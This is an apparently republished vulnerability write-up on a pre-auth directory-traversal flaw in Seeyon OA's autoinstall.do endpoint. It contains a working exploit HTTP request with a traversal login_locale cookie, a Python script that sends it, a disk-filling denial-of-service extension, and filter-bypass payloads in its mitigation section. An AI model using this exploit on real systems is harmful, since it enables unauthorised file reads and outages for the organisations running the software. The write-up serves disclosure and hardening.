How a Front‑End 0‑Day in a Major OA System Was Discovered and Exploited

The article walks through the discovery of an arbitrary ZIP-file download vulnerability in the front-end of a large OA system, detailing how the author traced the vulnerable Spring MVC controller, built a PoC around an attacker-controlled cookie, achieved directory-traversal reads, showed a DoS extension of the same bug, and finally suggested input-filter mitigations.

Black & White Path

Vulnerability Discovery (Arbitrary ZIP Download)

The author began by looking for file-download flaws, using the Content-Disposition header as the starting point for the search. By decompiling the OA's JAR files with jadx-gui, they located a controller class named AutoInstallController that is reachable from the front-end without authentication: the class carries the @NeedlessCheckLogin annotation, which marks it as exempt from the login check, so every handler in it is a pre-auth entry point.

Further inspection revealed that the controller inherits from BaseController, which in turn extends Spring MVC's legacy MultiActionController, a dispatcher that maps a request to one of several handler methods in the same class. The handler is selected by the method request parameter, so the caller chooses which method runs.

PoC Construction

Using the bean name autoinstall.do as the route, the author examined the vulnerable method regInstallDown64. The method takes localeName from the login_locale cookie, falling back to the Accept-Language header when the cookie is absent (both values are supplied by the client, so either source is attacker-controlled), and builds a temporary ZIP file path from it:

String fileName = SystemEnvironment.getSystemTempFolder() + separator + "regInstall64_" + request.getServerName() + "_" + localeName + ".zip";
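To see what the concatenation above does with a traversal payload, and to reproduce the request described in this article against a lab host, here is an added Python example; it is not the article's tooling or Seeyon's code. The temp folder, server name and cookie value are constructed to match the environment the article describes. One detail the article's quoted path leaves out: the concatenation puts the fixed segment regInstall64_<serverName>_ in front of localeName, and it is that (non-existent) segment which the payload's leading /../ consumes. On Windows the Win32 path layer collapses .. segments lexically before the file is opened, so the missing directory does not matter; on Linux each intermediate component must exist, so the same payload would not resolve there.

```python
import http.client
import ntpath

# Constructed to mirror the environment described in the article; adjust for your own lab target.
TEMP_FOLDER = r"C:\Seeyon\A8\base\temporary"   # what SystemEnvironment.getSystemTempFolder() returned there
SERVER_NAME = "192.168.127.129"                # request.getServerName(), taken from the Host header
PAYLOAD = "/../../../Logs"                     # value of the login_locale cookie in the PoC


def build_file_name(temp_folder, server_name, locale_name, separator="\\"):
    """Faithful model of the Java string concatenation in regInstallDown64: no validation at all."""
    return f"{temp_folder}{separator}regInstall64_{server_name}_{locale_name}.zip"


def resolve_windows(file_name):
    """Lexical normalisation as Win32 applies it: each '..' drops the preceding segment even when
    that segment (here the non-existent regInstall64_<host>_ directory) is not on disk."""
    return ntpath.normpath(file_name)


def looks_like_zip(data):
    """True for a ZIP local-file header or the end-of-central-directory record of an empty archive."""
    return data[:4] in (b"PK\x03\x04", b"PK\x05\x06")


def send_poc(host, locale_payload, port=80, timeout=10.0):
    """Send the article's request (trimmed to the headers that matter) and return
    (status, Content-Disposition header, body). Only use against systems you are authorised to test."""
    body = "method=regInstallDown64"                   # MultiActionController selects the handler from this
    headers = {
        "X-Requested-With": "XMLHttpRequest",
        "Cookie": f"login_locale={locale_payload};",  # becomes localeName, unvalidated
        "Content-Type": "application/x-www-form-urlencoded",
    }
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("POST", "/seeyon/autoinstall.do", body=body, headers=headers)
        resp = conn.getresponse()
        return resp.status, resp.getheader("Content-Disposition"), resp.read()
    finally:
        conn.close()


if __name__ == "__main__":
    raw = build_file_name(TEMP_FOLDER, SERVER_NAME, PAYLOAD)
    print("raw path   :", raw)
    print("resolves to:", resolve_windows(raw))
    # Against a lab host:
    # status, disposition, data = send_poc(SERVER_NAME, PAYLOAD)
    # print(status, disposition, looks_like_zip(data))
```

Run it offline to see the raw and normalised paths; uncomment the send_poc lines only against a host you are allowed to test. A 200 response whose body passes looks_like_zip and carries a Content-Disposition header is the same evidence the article relied on.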

Because the cookie value is under attacker control and no validation is performed, the attacker can inject directory-traversal sequences (e.g., ../) into localeName. The following HTTP request was crafted (note the malicious login_locale value):

POST /seeyon/autoinstall.do HTTP/1.1
Host: 192.168.127.129
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/144.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*
Origin: http://192.168.127.129
Referer: http://192.168.127.129/seeyon/main.do?method=main
Cookie: login_locale=/../../../Logs;
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

method=regInstallDown64

This payload caused the server to read C:\Seeyon\A8\base\temporary\../../../Logs.zip and return it as the download, effectively retrieving an arbitrary ZIP file from the filesystem. Two details of the concatenation matter here. First, the fixed prefix regInstall64_<serverName>_ sits immediately before localeName, so the payload has to start with a separator: the leading /../ turns that prefix into a path segment of its own and then discards it, and the remaining ../ sequences climb out of the temporary folder. Second, the code appends .zip, so only files with that extension can be reached. The traversal through a non-existent segment works because Windows collapses .. lexically before opening the file; on a Linux host every intermediate directory would have to exist.

Exploitation Details

By sending the request, the attacker confirmed that the Logs.zip file could be downloaded, demonstrating successful directory traversal and arbitrary file read.

Extended Impact (DoS Attack)

Further code analysis showed that if the generated fileName does not exist, the server creates it and writes the supplied data into it via CtpLocalFile. Since the same unvalidated localeName decides where that file lands, repeatedly supplying crafted login_locale values with different filenames lets an attacker scatter ZIP files across writable locations and fill the disk, leading to a denial-of-service condition.

Mitigation

The author recommends filtering the login_locale cookie to reject path-traversal characters such as ../, thereby preventing both arbitrary file read and the DoS vector. A blacklist of ../ alone is a weak fix: on Windows \..\ traverses just as well, and a single-pass removal of ../ turns /....//....//....//Logs back into /../../../Logs. The same check has to cover the Accept-Language fallback, which is equally client-controlled. A more robust fix is to accept localeName only from the set of locales the product ships and, as defence in depth, to canonicalize the final path and refuse it unless it still lies inside the temporary folder.
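The following is an added example, written in Python for illustration rather than taken from the article or from Seeyon's code, that contrasts the literal ../ blacklist with an allowlist plus a canonical-path check, and shows two inputs that defeat the blacklist. The temp folder, server name and locale list are assumptions; the checks map directly onto the Java method's inputs.

```python
import ntpath
import re

# Constructed values mirroring the article's environment; the locale allowlist is hypothetical.
TEMP_FOLDER = r"C:\Seeyon\A8\base\temporary"
SERVER_NAME = "192.168.127.129"
KNOWN_LOCALES = {"zh_CN", "zh_TW", "en", "ja"}          # locale packs the product is assumed to ship
LOCALE_RE = re.compile(r"^[a-z]{2,3}(?:_[A-Za-z]{2,4})?$")  # shape of a locale tag, nothing else


def build_file_name(temp_folder, server_name, locale_name, separator="\\"):
    """Same concatenation as the vulnerable method (kept so the checks below operate on real paths)."""
    return f"{temp_folder}{separator}regInstall64_{server_name}_{locale_name}.zip"


def naive_filter(locale_name):
    """The mitigation taken literally: strip '../' once. Shown here only to demonstrate its bypasses."""
    return locale_name.replace("../", "")


def validate_locale(locale_name):
    """Allowlist: the value must look like a locale tag and be one the product actually knows."""
    return bool(LOCALE_RE.match(locale_name)) and locale_name in KNOWN_LOCALES


def inside_temp(temp_folder, file_name):
    """Defence in depth: canonicalize (Windows rules) and require the result to stay under temp_folder."""
    base = ntpath.normcase(ntpath.normpath(temp_folder))
    target = ntpath.normcase(ntpath.normpath(file_name))
    return target.startswith(base + "\\")


def safe_file_name(temp_folder, server_name, locale_name):
    """Hardened path construction: the path, or None when the locale is rejected by either check."""
    if not validate_locale(locale_name):
        return None
    candidate = build_file_name(temp_folder, server_name, locale_name)
    return candidate if inside_temp(temp_folder, candidate) else None


if __name__ == "__main__":
    for value in ("zh_CN", "/../../../Logs", r"\..\..\..\Logs", "/....//....//....//Logs"):
        filtered = naive_filter(value)
        escaped = not inside_temp(TEMP_FOLDER, build_file_name(TEMP_FOLDER, SERVER_NAME, filtered))
        print(f"{value!r:28} blacklist->{filtered!r:20} escapes temp: {escaped}  allowlist: {safe_file_name(TEMP_FOLDER, SERVER_NAME, value)}")
```

The backslash payload never contains the substring ../, and the doubled-dot payload collapses to the article's own payload after one pass of the filter; both still escape the temporary folder, while the allowlist rejects everything that is not a shipped locale and the canonical-path check catches any traversal that slips past it.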

Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact admin@besthub.dev and we will review it promptly.

Tags: Java, Spring MVC, 0day, OA, directory traversal, Seeyon, zip download